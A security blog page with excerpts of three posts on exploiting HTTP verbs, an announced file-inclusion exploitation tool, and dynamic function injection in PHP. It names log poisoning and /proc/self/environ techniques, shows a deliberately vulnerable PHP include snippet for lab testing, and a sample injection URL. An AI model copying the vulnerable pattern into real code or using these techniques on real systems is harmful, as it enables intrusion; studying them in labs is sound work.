Exploiting HTTP Verbs

The HTTP protocol comprises of the following verbs or methods.

  • GET
  • HEAD
  • POST
  • PUT
  • DELETE
  • CONNECT
  • OPTIONS
  • TRACE

I assume you are well aware of these, you can read more about them in detail from this RFC document.
(more…)

Advertisements

LFi Freak – An Automated File Inclusion Exploiter

I am sure you know about exploiting file inclusion vulnerabilities. In file inclusion situations in common we can read files arbitrarily in the system or remotely depending on the permissions. In PHP environments commonly we poison the log files or inject malicious PHP into the user agent header and load the “/proc/self/environ” file. However when we encounter file inclusion situations in PHP environments we can use the in-built PHP wrappers to make our exploitations much easier or perhaps bypass existing filters.

There are lot of LFI exploitation tools available but I’ve written this tool mainly focusing on the usage of “php://input”, “php://filter” and “data://” methods.  Even though the title explicitly conveys “LFI Freak” this can be used for RFI vulnerabilities as well. This tool is written in Python 2.7 and I have included binaries for both Windows and Linux systems. If you are running from the source or want to modify this, you need the BeautifulSoup library.

Here is a small walkthrough of the features of the tool.

To test for local or remote file inclusions you can use the option one “Automated testing”. I am using DVWA in here. To test this tool create a small vulnerable file.

<?php
	echo "File included: ".$_REQUEST["page"]."<br>";
	$file =  $_REQUEST["page"];
	include $file;
?>

(more…)

Dynamic Function Injection in PHP

In PHP we can pass arguments to a function dynamically during runtime. For example have look at this example.

I have used call_user_func_array() to pass the arguments to the function. The syntax would be:

call_user_func_array(function, param_arr)

Since I have used $_GET we can pass the function and its arguments during runtime.

http://localhost/?func=user&args%5B%5D=Osanda&args%5B%5D=secret&args%5B%5D=abc@abc.com

(more…)